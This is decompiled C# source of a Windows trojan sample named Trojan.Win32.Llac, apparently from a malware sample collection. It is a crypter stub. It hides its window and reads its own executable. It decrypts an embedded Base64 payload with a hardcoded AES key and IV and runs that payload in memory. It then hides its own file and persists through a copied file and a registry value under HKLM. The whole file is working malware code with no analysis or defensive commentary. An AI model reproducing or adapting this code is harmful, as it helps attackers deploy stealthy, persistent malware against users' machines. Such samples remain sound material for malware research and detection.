MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.gxwf-aba0073bd9b9f0c6c0103f289f18d82411c0702308f5a0dbcae1b577edc263b3/c33361143b3e96389ca3aadf6fd2f8c02.cs

// Decompiled with JetBrains decompiler
// Type: A.c33361143b3e96389ca3aadf6fd2f8c02
// Assembly: Service, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: B7AA2EBA-E600-4CD2-B54D-4503D0055DE2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.gxwf-aba0073bd9b9f0c6c0103f289f18d82411c0702308f5a0dbcae1b577edc263b3.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using Service;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace A
{
  [DesignerGenerated]
  internal class c33361143b3e96389ca3aadf6fd2f8c02 : Form
  {
    private IContainer c67d8d6ffc9381949a45cc48e923e7d6b;
    private const string c90a50beefabe2ff8dcb9c51f4ffb68e0 = "wgi2zxoukr0hhws5ycvnyjrrxzfk24frvabfyuttjnq3";

    public c33361143b3e96389ca3aadf6fd2f8c02()
    {
      this.Load += new EventHandler(this.ca33f61d7102f4431a3b6c673001407cb);
      this.c69adeaa069e1d4e4dda047bb574f6789();
    }

    [DebuggerNonUserCode]
    protected override void Dispose(bool disposing)
    {
      try
      {
        if (!disposing || this.c67d8d6ffc9381949a45cc48e923e7d6b == null)
          return;
        this.c67d8d6ffc9381949a45cc48e923e7d6b.Dispose();
      }
      finally
      {
        base.Dispose(disposing);
      }
    }

    [DebuggerStepThrough]
    private void c69adeaa069e1d4e4dda047bb574f6789()
    {
      this.SuspendLayout();
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      this.ClientSize = new Size(31, 33);
      this.FormBorderStyle = FormBorderStyle.None;
      this.Name = ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(472);
      this.Opacity = 0.0;
      this.ShowIcon = false;
      this.ShowInTaskbar = false;
      this.WindowState = FormWindowState.Minimized;
      this.ResumeLayout(false);
    }

    private void ca33f61d7102f4431a3b6c673001407cb(
      object ccdf542d5c3b6b24e4521e5d1ca516374,
      EventArgs ceb7ff7b847fde7874be06426e2c0ad7d)
    {
      try
      {
        string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(483));
        byte[] data = this.cff89060edc9fe161ced6a50c85f119ef(Convert.FromBase64String(strArray[1]));
        Encoding.GetEncoding(1252).GetBytes(strArray[1]);
        PE32.PhysicalEducation(data, Application.ExecutablePath);
        if (Conversions.ToBoolean(strArray[4]))
          new Thread(new ThreadStart(this.cb45b3a15ef6872aec67104ac5095c88d))
          {
            IsBackground = false
          }.Start();
        if (Conversions.ToBoolean(strArray[3]))
        {
          string fileName = Path.GetFileName(Application.ExecutablePath);
          c47f80583ee24444198d7c06b960fffd3.c729b9605db62bf70f7791c5de837e56e.FileSystem.CopyFile(Application.ExecutablePath, ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(572) + fileName, true);
          RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(579), true);
          registryKey.SetValue(fileName, (object) ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(572));
          registryKey.Close();
        }
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        Process.GetCurrentProcess().Kill();
        ProjectData.ClearProjectError();
      }
      Process.GetCurrentProcess().Kill();
    }

    public void cb45b3a15ef6872aec67104ac5095c88d()
    {
      try
      {
        File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    public byte[] cff89060edc9fe161ced6a50c85f119ef(byte[] c595a5344dd4516dcddc22130a8ec8b1d)
    {
      using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
      {
        rijndaelManaged.IV = new byte[16]
        {
          (byte) 1,
          (byte) 2,
          (byte) 3,
          (byte) 4,
          (byte) 5,
          (byte) 6,
          (byte) 7,
          (byte) 8,
          (byte) 9,
          (byte) 1,
          (byte) 2,
          (byte) 3,
          (byte) 4,
          (byte) 5,
          (byte) 6,
          (byte) 7
        };
        rijndaelManaged.Key = new byte[16]
        {
          (byte) 7,
          (byte) 6,
          (byte) 5,
          (byte) 4,
          (byte) 3,
          (byte) 2,
          (byte) 1,
          (byte) 9,
          (byte) 8,
          (byte) 7,
          (byte) 6,
          (byte) 5,
          (byte) 4,
          (byte) 3,
          (byte) 2,
          (byte) 1
        };
        return rijndaelManaged.CreateDecryptor().TransformFinalBlock(c595a5344dd4516dcddc22130a8ec8b1d, 0, c595a5344dd4516dcddc22130a8ec8b1d.Length);
      }
    }
  }
}